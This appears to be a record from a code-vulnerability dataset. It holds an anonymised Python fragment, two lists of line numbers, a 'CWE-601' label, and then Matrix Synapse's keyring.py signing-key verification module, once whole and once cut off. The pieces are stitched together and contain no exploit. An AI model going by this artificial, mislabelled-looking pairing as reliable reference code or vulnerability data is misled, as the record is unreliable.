VAR_10=parent,
VAR_11=request,
**VAR_12,
)
VAR_1[VAR_6] = (VAR_14, VAR_15)
VAR_2[VAR_8] = (VAR_7, VAR_10, VAR_12)
VAR_61 = None
try:
VAR_61 = get_cacheable_component(VAR_17)
except UnicornCacheError as e:
VAR_0.warning(e)
if VAR_61:
if VAR_4:
VAR_3[VAR_8] = VAR_61
VAR_47.set(
VAR_61.component_cache_key, VAR_61
)
return VAR_17
except ModuleNotFoundError as e:
VAR_63 = e
except AttributeError as e:
VAR_63 = e
raise ComponentLoadError(
f"'{VAR_6}' VAR_17 could not be loaded: {VAR_63}"
) from VAR_63
| [
7,
15,
17,
19,
27,
28,
30,
31,
32,
34,
35,
37,
38,
39,
42,
43,
45,
47,
48,
50,
53,
54,
57,
59,
61,
62,
66,
67,
70,
71,
73,
74,
76,
80,
83,
85,
91,
93,
97,
100,
102,
103,
125,
129,
134,
136,
137,
145,
146,
150,
151,
153,
154,
156,
159,
161,
163,
165,
169,
172,
175,
182,
189,
191,
192,
197,
199,
202,
213,
233,
239,
245,
251,
257,
263,
269,
275,
281,
287,
293,
299,
303,
307,
308,
311,
313,
314,
315,
316,
317,
318,
324,
326,
332,
336,
337,
343,
345,
351,
352,
354,
357,
361,
365,
366,
367,
368,
374,
386,
390,
392,
399,
403,
410,
412,
417,
419,
423,
428,
432,
433,
436,
438,
441,
444,
445,
446,
447,
448,
449,
452,
458,
461,
468,
470,
480,
482,
488,
491,
494,
496,
499,
503,
505,
506,
507,
508,
511,
515,
518,
520,
525,
532,
535,
542,
544,
551,
556,
560,
566,
572,
590,
595,
596,
617,
643,
647,
654,
668,
677,
684,
694,
696,
700,
702,
703,
704,
705,
710,
716,
718,
719,
724,
726,
729,
740,
742,
744,
749,
750,
754,
767,
768,
770,
771,
773,
774,
776,
781,
785,
789,
795,
799,
114,
115,
116,
185,
186,
187,
205,
206,
207,
208,
235,
236,
237,
241,
242,
243,
247,
248,
249,
253,
254,
255,
259,
260,
261,
265,
266,
267,
271,
272,
273,
277,
278,
279,
283,
284,
285,
289,
290,
291,
296,
297,
298,
299,
300,
301,
302,
329,
330,
331,
406,
407,
408,
409,
426,
427,
428,
429,
430,
431,
473,
474,
475,
485,
486,
487,
528,
529,
530,
531,
547,
548,
549,
563,
564,
565,
566,
567,
568,
569,
570,
592,
593,
594,
666,
667,
668,
669,
670,
671,
672,
673,
674,
675,
676,
677,
678,
679,
680,
681,
689,
690,
691
] | [
7,
14,
16,
18,
26,
27,
29,
30,
31,
33,
34,
36,
37,
38,
41,
42,
44,
46,
47,
49,
52,
53,
56,
58,
60,
61,
65,
66,
69,
70,
72,
73,
75,
79,
82,
84,
90,
92,
96,
99,
101,
102,
124,
128,
133,
135,
136,
144,
145,
149,
150,
152,
153,
155,
158,
160,
162,
164,
168,
171,
174,
181,
188,
190,
191,
196,
198,
201,
212,
232,
238,
244,
250,
256,
262,
268,
274,
280,
286,
292,
298,
302,
306,
307,
310,
312,
313,
314,
315,
316,
317,
323,
325,
331,
335,
336,
342,
343,
345,
348,
352,
356,
357,
358,
359,
365,
369,
371,
378,
382,
389,
391,
396,
398,
402,
407,
411,
412,
415,
417,
420,
423,
424,
425,
426,
427,
428,
431,
437,
440,
447,
449,
459,
461,
467,
470,
473,
475,
478,
482,
484,
485,
486,
487,
490,
494,
497,
499,
504,
511,
514,
521,
523,
530,
535,
539,
545,
551,
569,
574,
575,
596,
622,
626,
633,
647,
656,
663,
673,
675,
679,
681,
682,
683,
684,
689,
695,
697,
698,
703,
705,
708,
719,
721,
723,
728,
729,
733,
746,
747,
749,
750,
752,
753,
755,
760,
764,
768,
774,
778,
113,
114,
115,
184,
185,
186,
204,
205,
206,
207,
234,
235,
236,
240,
241,
242,
246,
247,
248,
252,
253,
254,
258,
259,
260,
264,
265,
266,
270,
271,
272,
276,
277,
278,
282,
283,
284,
288,
289,
290,
295,
296,
297,
298,
299,
300,
301,
328,
329,
330,
385,
386,
387,
388,
405,
406,
407,
408,
409,
410,
452,
453,
454,
464,
465,
466,
507,
508,
509,
510,
526,
527,
528,
542,
543,
544,
545,
546,
547,
548,
549,
571,
572,
573,
645,
646,
647,
648,
649,
650,
651,
652,
653,
654,
655,
656,
657,
658,
659,
660,
668,
669,
670
] |
4CWE-601
| # -*- coding: utf-8 -*-
# Copyright 2014-2016 OpenMarket Ltd
# Copyright 2017, 2018 New Vector Ltd
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
import logging
import urllib
from collections import defaultdict
import attr
from signedjson.key import (
decode_verify_key_bytes,
encode_verify_key_base64,
is_signing_algorithm_supported,
)
from signedjson.sign import (
SignatureVerifyException,
encode_canonical_json,
signature_ids,
verify_signed_json,
)
from unpaddedbase64 import decode_base64
from twisted.internet import defer
from synapse.api.errors import (
Codes,
HttpResponseException,
RequestSendFailed,
SynapseError,
)
from synapse.logging.context import (
PreserveLoggingContext,
make_deferred_yieldable,
preserve_fn,
run_in_background,
)
from synapse.storage.keys import FetchKeyResult
from synapse.util import unwrapFirstError
from synapse.util.async_helpers import yieldable_gather_results
from synapse.util.metrics import Measure
from synapse.util.retryutils import NotRetryingDestination
logger = logging.getLogger(__name__)
@attr.s(slots=True, cmp=False)
class VerifyJsonRequest:
"""
A request to verify a JSON object.
Attributes:
server_name(str): The name of the server to verify against.
key_ids(set[str]): The set of key_ids to that could be used to verify the
JSON object
json_object(dict): The JSON object to verify.
minimum_valid_until_ts (int): time at which we require the signing key to
be valid. (0 implies we don't care)
key_ready (Deferred[str, str, nacl.signing.VerifyKey]):
A deferred (server_name, key_id, verify_key) tuple that resolves when
a verify key has been fetched. The deferreds' callbacks are run with no
logcontext.
If we are unable to find a key which satisfies the request, the deferred
errbacks with an M_UNAUTHORIZED SynapseError.
"""
server_name = attr.ib()
json_object = attr.ib()
minimum_valid_until_ts = attr.ib()
request_name = attr.ib()
key_ids = attr.ib(init=False)
key_ready = attr.ib(default=attr.Factory(defer.Deferred))
def __attrs_post_init__(self):
self.key_ids = signature_ids(self.json_object, self.server_name)
class KeyLookupError(ValueError):
pass
class Keyring:
def __init__(self, hs, key_fetchers=None):
self.clock = hs.get_clock()
if key_fetchers is None:
key_fetchers = (
StoreKeyFetcher(hs),
PerspectivesKeyFetcher(hs),
ServerKeyFetcher(hs),
)
self._key_fetchers = key_fetchers
# map from server name to Deferred. Has an entry for each server with
# an ongoing key download; the Deferred completes once the download
# completes.
#
# These are regular, logcontext-agnostic Deferreds.
self.key_downloads = {}
def verify_json_for_server(
self, server_name, json_object, validity_time, request_name
):
"""Verify that a JSON object has been signed by a given server
Args:
server_name (str): name of the server which must have signed this object
json_object (dict): object to be checked
validity_time (int): timestamp at which we require the signing key to
be valid. (0 implies we don't care)
request_name (str): an identifier for this json object (eg, an event id)
for logging.
Returns:
Deferred[None]: completes if the the object was correctly signed, otherwise
errbacks with an error
"""
req = VerifyJsonRequest(server_name, json_object, validity_time, request_name)
requests = (req,)
return make_deferred_yieldable(self._verify_objects(requests)[0])
def verify_json_objects_for_server(self, server_and_json):
"""Bulk verifies signatures of json objects, bulk fetching keys as
necessary.
Args:
server_and_json (iterable[Tuple[str, dict, int, str]):
Iterable of (server_name, json_object, validity_time, request_name)
tuples.
validity_time is a timestamp at which the signing key must be
valid.
request_name is an identifier for this json object (eg, an event id)
for logging.
Returns:
List<Deferred[None]>: for each input triplet, a deferred indicating success
or failure to verify each json object's signature for the given
server_name. The deferreds run their callbacks in the sentinel
logcontext.
"""
return self._verify_objects(
VerifyJsonRequest(server_name, json_object, validity_time, request_name)
for server_name, json_object, validity_time, request_name in server_and_json
)
def _verify_objects(self, verify_requests):
"""Does the work of verify_json_[objects_]for_server
Args:
verify_requests (iterable[VerifyJsonRequest]):
Iterable of verification requests.
Returns:
List<Deferred[None]>: for each input item, a deferred indicating success
or failure to verify each json object's signature for the given
server_name. The deferreds run their callbacks in the sentinel
logcontext.
"""
# a list of VerifyJsonRequests which are awaiting a key lookup
key_lookups = []
handle = preserve_fn(_handle_key_deferred)
def process(verify_request):
"""Process an entry in the request list
Adds a key request to key_lookups, and returns a deferred which
will complete or fail (in the sentinel context) when verification completes.
"""
if not verify_request.key_ids:
return defer.fail(
SynapseError(
400,
"Not signed by %s" % (verify_request.server_name,),
Codes.UNAUTHORIZED,
)
)
logger.debug(
"Verifying %s for %s with key_ids %s, min_validity %i",
verify_request.request_name,
verify_request.server_name,
verify_request.key_ids,
verify_request.minimum_valid_until_ts,
)
# add the key request to the queue, but don't start it off yet.
key_lookups.append(verify_request)
# now run _handle_key_deferred, which will wait for the key request
# to complete and then do the verification.
#
# We want _handle_key_request to log to the right context, so we
# wrap it with preserve_fn (aka run_in_background)
return handle(verify_request)
results = [process(r) for r in verify_requests]
if key_lookups:
run_in_background(self._start_key_lookups, key_lookups)
return results
async def _start_key_lookups(self, verify_requests):
"""Sets off the key fetches for each verify request
Once each fetch completes, verify_request.key_ready will be resolved.
Args:
verify_requests (List[VerifyJsonRequest]):
"""
try:
# map from server name to a set of outstanding request ids
server_to_request_ids = {}
for verify_request in verify_requests:
server_name = verify_request.server_name
request_id = id(verify_request)
server_to_request_ids.setdefault(server_name, set()).add(request_id)
# Wait for any previous lookups to complete before proceeding.
await self.wait_for_previous_lookups(server_to_request_ids.keys())
# take out a lock on each of the servers by sticking a Deferred in
# key_downloads
for server_name in server_to_request_ids.keys():
self.key_downloads[server_name] = defer.Deferred()
logger.debug("Got key lookup lock on %s", server_name)
# When we've finished fetching all the keys for a given server_name,
# drop the lock by resolving the deferred in key_downloads.
def drop_server_lock(server_name):
d = self.key_downloads.pop(server_name)
d.callback(None)
def lookup_done(res, verify_request):
server_name = verify_request.server_name
server_requests = server_to_request_ids[server_name]
server_requests.remove(id(verify_request))
# if there are no more requests for this server, we can drop the lock.
if not server_requests:
logger.debug("Releasing key lookup lock on %s", server_name)
drop_server_lock(server_name)
return res
for verify_request in verify_requests:
verify_request.key_ready.addBoth(lookup_done, verify_request)
# Actually start fetching keys.
self._get_server_verify_keys(verify_requests)
except Exception:
logger.exception("Error starting key lookups")
async def wait_for_previous_lookups(self, server_names) -> None:
"""Waits for any previous key lookups for the given servers to finish.
Args:
server_names (Iterable[str]): list of servers which we want to look up
Returns:
Resolves once all key lookups for the given servers have
completed. Follows the synapse rules of logcontext preservation.
"""
loop_count = 1
while True:
wait_on = [
(server_name, self.key_downloads[server_name])
for server_name in server_names
if server_name in self.key_downloads
]
if not wait_on:
break
logger.info(
"Waiting for existing lookups for %s to complete [loop %i]",
[w[0] for w in wait_on],
loop_count,
)
with PreserveLoggingContext():
await defer.DeferredList((w[1] for w in wait_on))
loop_count += 1
def _get_server_verify_keys(self, verify_requests):
"""Tries to find at least one key for each verify request
For each verify_request, verify_request.key_ready is called back with
params (server_name, key_id, VerifyKey) if a key is found, or errbacked
with a SynapseError if none of the keys are found.
Args:
verify_requests (list[VerifyJsonRequest]): list of verify requests
"""
remaining_requests = {rq for rq in verify_requests if not rq.key_ready.called}
async def do_iterations():
try:
with Measure(self.clock, "get_server_verify_keys"):
for f in self._key_fetchers:
if not remaining_requests:
return
await self._attempt_key_fetches_with_fetcher(
f, remaining_requests
)
# look for any requests which weren't satisfied
while remaining_requests:
verify_request = remaining_requests.pop()
rq_str = (
"VerifyJsonRequest(server=%s, key_ids=%s, min_valid=%i)"
% (
verify_request.server_name,
verify_request.key_ids,
verify_request.minimum_valid_until_ts,
)
)
# If we run the errback immediately, it may cancel our
# loggingcontext while we are still in it, so instead we
# schedule it for the next time round the reactor.
#
# (this also ensures that we don't get a stack overflow if we
# has a massive queue of lookups waiting for this server).
self.clock.call_later(
0,
verify_request.key_ready.errback,
SynapseError(
401,
"Failed to find any key to satisfy %s" % (rq_str,),
Codes.UNAUTHORIZED,
),
)
except Exception as err:
# we don't really expect to get here, because any errors should already
# have been caught and logged. But if we do, let's log the error and make
# sure that all of the deferreds are resolved.
logger.error("Unexpected error in _get_server_verify_keys: %s", err)
with PreserveLoggingContext():
for verify_request in remaining_requests:
if not verify_request.key_ready.called:
verify_request.key_ready.errback(err)
run_in_background(do_iterations)
async def _attempt_key_fetches_with_fetcher(self, fetcher, remaining_requests):
"""Use a key fetcher to attempt to satisfy some key requests
Args:
fetcher (KeyFetcher): fetcher to use to fetch the keys
remaining_requests (set[VerifyJsonRequest]): outstanding key requests.
Any successfully-completed requests will be removed from the list.
"""
# dict[str, dict[str, int]]: keys to fetch.
# server_name -> key_id -> min_valid_ts
missing_keys = defaultdict(dict)
for verify_request in remaining_requests:
# any completed requests should already have been removed
assert not verify_request.key_ready.called
keys_for_server = missing_keys[verify_request.server_name]
for key_id in verify_request.key_ids:
# If we have several requests for the same key, then we only need to
# request that key once, but we should do so with the greatest
# min_valid_until_ts of the requests, so that we can satisfy all of
# the requests.
keys_for_server[key_id] = max(
keys_for_server.get(key_id, -1),
verify_request.minimum_valid_until_ts,
)
results = await fetcher.get_keys(missing_keys)
completed = []
for verify_request in remaining_requests:
server_name = verify_request.server_name
# see if any of the keys we got this time are sufficient to
# complete this VerifyJsonRequest.
result_keys = results.get(server_name, {})
for key_id in verify_request.key_ids:
fetch_key_result = result_keys.get(key_id)
if not fetch_key_result:
# we didn't get a result for this key
continue
if (
fetch_key_result.valid_until_ts
< verify_request.minimum_valid_until_ts
):
# key was not valid at this point
continue
# we have a valid key for this request. If we run the callback
# immediately, it may cancel our loggingcontext while we are still in
# it, so instead we schedule it for the next time round the reactor.
#
# (this also ensures that we don't get a stack overflow if we had
# a massive queue of lookups waiting for this server).
logger.debug(
"Found key %s:%s for %s",
server_name,
key_id,
verify_request.request_name,
)
self.clock.call_later(
0,
verify_request.key_ready.callback,
(server_name, key_id, fetch_key_result.verify_key),
)
completed.append(verify_request)
break
remaining_requests.difference_update(completed)
class KeyFetcher:
async def get_keys(self, keys_to_fetch):
"""
Args:
keys_to_fetch (dict[str, dict[str, int]]):
the keys to be fetched. server_name -> key_id -> min_valid_ts
Returns:
Deferred[dict[str, dict[str, synapse.storage.keys.FetchKeyResult|None]]]:
map from server_name -> key_id -> FetchKeyResult
"""
raise NotImplementedError
class StoreKeyFetcher(KeyFetcher):
"""KeyFetcher impl which fetches keys from our data store"""
def __init__(self, hs):
self.store = hs.get_datastore()
async def get_keys(self, keys_to_fetch):
"""see KeyFetcher.get_keys"""
keys_to_fetch = (
(server_name, key_id)
for server_name, keys_for_server in keys_to_fetch.items()
for key_id in keys_for_server.keys()
)
res = await self.store.get_server_verify_keys(keys_to_fetch)
keys = {}
for (server_name, key_id), key in res.items():
keys.setdefault(server_name, {})[key_id] = key
return keys
class BaseV2KeyFetcher:
def __init__(self, hs):
self.store = hs.get_datastore()
self.config = hs.get_config()
async def process_v2_response(self, from_server, response_json, time_added_ms):
"""Parse a 'Server Keys' structure from the result of a /key request
This is used to parse either the entirety of the response from
GET /_matrix/key/v2/server, or a single entry from the list returned by
POST /_matrix/key/v2/query.
Checks that each signature in the response that claims to come from the origin
server is valid, and that there is at least one such signature.
Stores the json in server_keys_json so that it can be used for future responses
to /_matrix/key/v2/query.
Args:
from_server (str): the name of the server producing this result: either
the origin server for a /_matrix/key/v2/server request, or the notary
for a /_matrix/key/v2/query.
response_json (dict): the json-decoded Server Keys response object
time_added_ms (int): the timestamp to record in server_keys_json
Returns:
Deferred[dict[str, FetchKeyResult]]: map from key_id to result object
"""
ts_valid_until_ms = response_json["valid_until_ts"]
# start by extracting the keys from the response, since they may be required
# to validate the signature on the response.
verify_keys = {}
for key_id, key_data in response_json["verify_keys"].items():
if is_signing_algorithm_supported(key_id):
key_base64 = key_data["key"]
key_bytes = decode_base64(key_base64)
verify_key = decode_verify_key_bytes(key_id, key_bytes)
verify_keys[key_id] = FetchKeyResult(
verify_key=verify_key, valid_until_ts=ts_valid_until_ms
)
server_name = response_json["server_name"]
verified = False
for key_id in response_json["signatures"].get(server_name, {}):
key = verify_keys.get(key_id)
if not key:
# the key may not be present in verify_keys if:
# * we got the key from the notary server, and:
# * the key belongs to the notary server, and:
# * the notary server is using a different key to sign notary
# responses.
continue
verify_signed_json(response_json, server_name, key.verify_key)
verified = True
break
if not verified:
raise KeyLookupError(
"Key response for %s is not signed by the origin server"
% (server_name,)
)
for key_id, key_data in response_json["old_verify_keys"].items():
if is_signing_algorithm_supported(key_id):
key_base64 = key_data["key"]
key_bytes = decode_base64(key_base64)
verify_key = decode_verify_key_bytes(key_id, key_bytes)
verify_keys[key_id] = FetchKeyResult(
verify_key=verify_key, valid_until_ts=key_data["expired_ts"]
)
key_json_bytes = encode_canonical_json(response_json)
await make_deferred_yieldable(
defer.gatherResults(
[
run_in_background(
self.store.store_server_keys_json,
server_name=server_name,
key_id=key_id,
from_server=from_server,
ts_now_ms=time_added_ms,
ts_expires_ms=ts_valid_until_ms,
key_json_bytes=key_json_bytes,
)
for key_id in verify_keys
],
consumeErrors=True,
).addErrback(unwrapFirstError)
)
return verify_keys
class PerspectivesKeyFetcher(BaseV2KeyFetcher):
"""KeyFetcher impl which fetches keys from the "perspectives" servers"""
def __init__(self, hs):
super().__init__(hs)
self.clock = hs.get_clock()
self.client = hs.get_http_client()
self.key_servers = self.config.key_servers
async def get_keys(self, keys_to_fetch):
"""see KeyFetcher.get_keys"""
async def get_key(key_server):
try:
result = await self.get_server_verify_key_v2_indirect(
keys_to_fetch, key_server
)
return result
except KeyLookupError as e:
logger.warning(
"Key lookup failed from %r: %s", key_server.server_name, e
)
except Exception as e:
logger.exception(
"Unable to get key from %r: %s %s",
key_server.server_name,
type(e).__name__,
str(e),
)
return {}
results = await make_deferred_yieldable(
defer.gatherResults(
[run_in_background(get_key, server) for server in self.key_servers],
consumeErrors=True,
).addErrback(unwrapFirstError)
)
union_of_keys = {}
for result in results:
for server_name, keys in result.items():
union_of_keys.setdefault(server_name, {}).update(keys)
return union_of_keys
async def get_server_verify_key_v2_indirect(self, keys_to_fetch, key_server):
"""
Args:
keys_to_fetch (dict[str, dict[str, int]]):
the keys to be fetched. server_name -> key_id -> min_valid_ts
key_server (synapse.config.key.TrustedKeyServer): notary server to query for
the keys
Returns:
dict[str, dict[str, synapse.storage.keys.FetchKeyResult]]: map
from server_name -> key_id -> FetchKeyResult
Raises:
KeyLookupError if there was an error processing the entire response from
the server
"""
perspective_name = key_server.server_name
logger.info(
"Requesting keys %s from notary server %s",
keys_to_fetch.items(),
perspective_name,
)
try:
query_response = await self.client.post_json(
destination=perspective_name,
path="/_matrix/key/v2/query",
data={
"server_keys": {
server_name: {
key_id: {"minimum_valid_until_ts": min_valid_ts}
for key_id, min_valid_ts in server_keys.items()
}
for server_name, server_keys in keys_to_fetch.items()
}
},
)
except (NotRetryingDestination, RequestSendFailed) as e:
# these both have str() representations which we can't really improve upon
raise KeyLookupError(str(e))
except HttpResponseException as e:
raise KeyLookupError("Remote server returned an error: %s" % (e,))
keys = {}
added_keys = []
time_now_ms = self.clock.time_msec()
for response in query_response["server_keys"]:
# do this first, so that we can give useful errors thereafter
server_name = response.get("server_name")
if not isinstance(server_name, str):
raise KeyLookupError(
"Malformed response from key notary server %s: invalid server_name"
% (perspective_name,)
)
try:
self._validate_perspectives_response(key_server, response)
processed_response = await self.process_v2_response(
perspective_name, response, time_added_ms=time_now_ms
)
except KeyLookupError as e:
logger.warning(
"Error processing response from key notary server %s for origin "
"server %s: %s",
perspective_name,
server_name,
e,
)
# we continue to process the rest of the response
continue
added_keys.extend(
(server_name, key_id, key) for key_id, key in processed_response.items()
)
keys.setdefault(server_name, {}).update(processed_response)
await self.store.store_server_verify_keys(
perspective_name, time_now_ms, added_keys
)
return keys
def _validate_perspectives_response(self, key_server, response):
"""Optionally check the signature on the result of a /key/query request
Args:
key_server (synapse.config.key.TrustedKeyServer): the notary server that
produced this result
response (dict): the json-decoded Server Keys response object
"""
perspective_name = key_server.server_name
perspective_keys = key_server.verify_keys
if perspective_keys is None:
# signature checking is disabled on this server
return
if (
"signatures" not in response
or perspective_name not in response["signatures"]
):
raise KeyLookupError("Response not signed by the notary server")
verified = False
for key_id in response["signatures"][perspective_name]:
if key_id in perspective_keys:
verify_signed_json(response, perspective_name, perspective_keys[key_id])
verified = True
if not verified:
raise KeyLookupError(
"Response not signed with a known key: signed with: %r, known keys: %r"
% (
list(response["signatures"][perspective_name].keys()),
list(perspective_keys.keys()),
)
)
class ServerKeyFetcher(BaseV2KeyFetcher):
"""KeyFetcher impl which fetches keys from the origin servers"""
def __init__(self, hs):
super().__init__(hs)
self.clock = hs.get_clock()
self.client = hs.get_http_client()
async def get_keys(self, keys_to_fetch):
"""
Args:
keys_to_fetch (dict[str, iterable[str]]):
the keys to be fetched. server_name -> key_ids
Returns:
dict[str, dict[str, synapse.storage.keys.FetchKeyResult|None]]:
map from server_name -> key_id -> FetchKeyResult
"""
results = {}
async def get_key(key_to_fetch_item):
server_name, key_ids = key_to_fetch_item
try:
keys = await self.get_server_verify_key_v2_direct(server_name, key_ids)
results[server_name] = keys
except KeyLookupError as e:
logger.warning(
"Error looking up keys %s from %s: %s", key_ids, server_name, e
)
except Exception:
logger.exception("Error getting keys %s from %s", key_ids, server_name)
await yieldable_gather_results(get_key, keys_to_fetch.items())
return results
async def get_server_verify_key_v2_direct(self, server_name, key_ids):
"""
Args:
server_name (str):
key_ids (iterable[str]):
Returns:
dict[str, FetchKeyResult]: map from key ID to lookup result
Raises:
KeyLookupError if there was a problem making the lookup
"""
keys = {} # type: dict[str, FetchKeyResult]
for requested_key_id in key_ids:
# we may have found this key as a side-effect of asking for another.
if requested_key_id in keys:
continue
time_now_ms = self.clock.time_msec()
try:
response = await self.client.get_json(
destination=server_name,
path="/_matrix/key/v2/server/"
+ urllib.parse.quote(requested_key_id),
ignore_backoff=True,
# we only give the remote server 10s to respond. It should be an
# easy request to handle, so if it doesn't reply within 10s, it's
# probably not going to.
#
# Furthermore, when we are acting as a notary server, we cannot
# wait all day for all of the origin servers, as the requesting
# server will otherwise time out before we can respond.
#
# (Note that get_json may make 4 attempts, so this can still take
# almost 45 seconds to fetch the headers, plus up to another 60s to
# read the response).
timeout=10000,
)
except (NotRetryingDestination, RequestSendFailed) as e:
# these both have str() representations which we can't really improve
# upon
raise KeyLookupError(str(e))
except HttpResponseException as e:
raise KeyLookupError("Remote server returned an error: %s" % (e,))
if response["server_name"] != server_name:
raise KeyLookupError(
"Expected a response for server %r not %r"
% (server_name, response["server_name"])
)
response_keys = await self.process_v2_response(
from_server=server_name,
response_json=response,
time_added_ms=time_now_ms,
)
await self.store.store_server_verify_keys(
server_name,
time_now_ms,
((server_name, key_id, key) for key_id, key in response_keys.items()),
)
keys.update(response_keys)
return keys
async def _handle_key_deferred(verify_request) -> None:
"""Waits for the key to become available, and then performs a verification
Args:
verify_request (VerifyJsonRequest):
Raises:
SynapseError if there was a problem performing the verification
"""
server_name = verify_request.server_name
with PreserveLoggingContext():
_, key_id, verify_key = await verify_request.key_ready
json_object = verify_request.json_object
try:
verify_signed_json(json_object, server_name, verify_key)
except SignatureVerifyException as e:
logger.debug(
"Error verifying signature for %s:%s:%s with key %s: %s",
server_name,
verify_key.alg,
verify_key.version,
encode_verify_key_base64(verify_key),
str(e),
)
raise SynapseError(
401,
"Invalid signature for server %s with key %s:%s: %s"
% (server_name, verify_key.alg, verify_key.version, str(e)),
Codes.UNAUTHORIZED,
)
| # -*- coding: utf-8 -*-
# Copyright 2014-2016 OpenMarket Ltd
# Copyright 2017, 2018 New Vector Ltd
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
import logging
import urllib
from collections import defaultdict
import attr
from signedjson.key import (
decode_verify_key_bytes,
encode_verify_key_base64,
is_signing_algorithm_supported,
)
from signedjson.sign import (
SignatureVerifyException,
encode_canonical_json,
signature_ids,
verify_signed_json,
)
from unpaddedbase64 import decode_base64
from twisted.internet import defer
from synapse.api.errors import (
Codes,
HttpResponseException,
RequestSendFailed,
SynapseError,
)
from synapse.logging.context import (
PreserveLoggingContext,
make_deferred_yieldable,
preserve_fn,
run_in_background,
)
from synapse.storage.keys import FetchKeyResult
from synapse.util import unwrapFirstError
from synapse.util.async_helpers import yieldable_gather_results
from synapse.util.metrics import Measure
from synapse.util.retryutils import NotRetryingDestination
logger = logging.getLogger(__name__)
@attr.s(slots=True, cmp=False)
class VerifyJsonRequest:
"""
A request to verify a JSON object.
Attributes:
server_name(str): The name of the server to verify against.
key_ids(set[str]): The set of key_ids to that could be used to verify the
JSON object
json_object(dict): The JSON object to verify.
minimum_valid_until_ts (int): time at which we require the signing key to
be valid. (0 implies we don't care)
key_ready (Deferred[str, str, nacl.signing.VerifyKey]):
A deferred (server_name, key_id, verify_key) tuple that resolves when
a verify key has been fetched. The deferreds' callbacks are run with no
logcontext.
If we are unable to find a key which satisfies the request, the deferred
errbacks with an M_UNAUTHORIZED SynapseError.
"""
server_name = attr.ib()
json_object = attr.ib()
minimum_valid_until_ts = attr.ib()
request_name = attr.ib()
key_ids = attr.ib(init=False)
key_ready = attr.ib(default=attr.Factory(defer.Deferred))
def __attrs_post_init__(self):
self.key_ids = signature_ids(self.json_object, self.server_name)
class KeyLookupError(ValueError):
pass
class Keyring:
def __init__(self, hs, key_fetchers=None):
self.clock = hs.get_clock()
if key_fetchers is None:
key_fetchers = (
StoreKeyFetcher(hs),
PerspectivesKeyFetcher(hs),
ServerKeyFetcher(hs),
)
self._key_fetchers = key_fetchers
# map from server name to Deferred. Has an entry for each server with
# an ongoing key download; the Deferred completes once the download
# completes.
#
# These are regular, logcontext-agnostic Deferreds.
self.key_downloads = {}
def verify_json_for_server(
self, server_name, json_object, validity_time, request_name
):
"""Verify that a JSON object has been signed by a given server
Args:
server_name (str): name of the server which must have signed this object
json_object (dict): object to be checked
validity_time (int): timestamp at which we require the signing key to
be valid. (0 implies we don't care)
request_name (str): an identifier for this json object (eg, an event id)
for logging.
Returns:
Deferred[None]: completes if the the object was correctly signed, otherwise
errbacks with an error
"""
req = VerifyJsonRequest(server_name, json_object, validity_time, request_name)
requests = (req,)
return make_deferred_yieldable(self._verify_objects(requests)[0])
def verify_json_objects_for_server(self, server_and_json):
"""Bulk verifies signatures of json objects, bulk fetching keys as
necessary.
Args:
server_and_json (iterable[Tuple[str, dict, int, str]):
Iterable of (server_name, json_object, validity_time, request_name)
tuples.
validity_time is a timestamp at which the signing key must be
valid.
request_name is an identifier for this json object (eg, an event id)
for logging.
Returns:
List<Deferred[None]>: for each input triplet, a deferred indicating success
or failure to verify each json object's signature for the given
server_name. The deferreds run their callbacks in the sentinel
logcontext.
"""
return self._verify_objects(
VerifyJsonRequest(server_name, json_object, validity_time, request_name)
for server_name, json_object, validity_time, request_name in server_and_json
)
def _verify_objects(self, verify_requests):
"""Does the work of verify_json_[objects_]for_server
Args:
verify_requests (iterable[VerifyJsonRequest]):
Iterable of verification requests.
Returns:
List<Deferred[None]>: for each input item, a deferred indicating success
or failure to verify each json object's signature for the given
server_name. The deferreds run their callbacks in the sentinel
logcontext.
"""
# a list of VerifyJsonRequests which are awaiting a key lookup
key_lookups = []
handle = preserve_fn(_handle_key_deferred)
def process(verify_request):
"""Process an entry in the request list
Adds a key request to key_lookups, and returns a deferred which
will complete or fail (in the sentinel context) when verification completes.
"""
if not verify_request.key_ids:
return defer.fail(
SynapseError(
400,
"Not signed by %s" % (verify_request.server_name,),
Codes.UNAUTHORIZED,
)
)
logger.debug(
"Verifying %s for %s with key_ids %s, min_validity %i",
verify_request.request_name,
verify_request.server_name,
verify_request.key_ids,
verify_request.minimum_valid_until_ts,
)
# add the key request to the queue, but don't start it off yet.
key_lookups.append(verify_request)
# now run _handle_key_deferred, which will wait for the key request
# to complete and then do the verification.
#
# We want _handle_key_request to log to the right context, so we
# wrap it with preserve_fn (aka run_in_background)
return handle(verify_request)
results = [process(r) for r in verify_requests]
if key_lookups:
run_in_background(self._start_key_lookups, key_lookups)
return results
async def _start_key_lookups(self, verify_requests):
"""Sets off the key fetches for each verify request
Once each fetch completes, verify_request.key_ready will be resolved.
Args:
verify_requests (List[VerifyJsonRequest]):
"""
try:
# map from server name to a set of outstanding request ids
server_to_request_ids = {}
for verify_request in verify_requests:
server_name = verify_request.server_name
request_id = id(verify_request)
server_to_request_ids.setdefault(server_name, set()).add(request_id)
# Wait for any previous lookups to complete before proceeding.
await self.wait_for_previous_lookups(server_to_request_ids.keys())
# take out a lock on each of the servers by sticking a Deferred in
# key_downloads
for server_name in server_to_request_ids.keys():
self.key_downloads[server_name] = defer.Deferred()
logger.debug("Got key lookup lock on %s", server_name)
# When we've finished fetching all the keys for a given server_name,
# drop the lock by resolving the deferred in key_downloads.
def drop_server_lock(server_name):
d = self.key_downloads.pop(server_name)
d.callback(None)
def lookup_done(res, verify_request):
server_name = verify_request.server_name
server_requests = server_to_request_ids[server_name]
server_requests.remove(id(verify_request))
# if there are no more requests for this server, we can drop the lock.
if not server_requests:
logger.debug("Releasing key lookup lock on %s", server_name)
drop_server_lock(server_name)
return res
for verify_request in verify_requests:
verify_request.key_ready.addBoth(lookup_done, verify_request)
# Actually start fetching keys.
self._get_server_verify_keys(verify_requests)
except Exception:
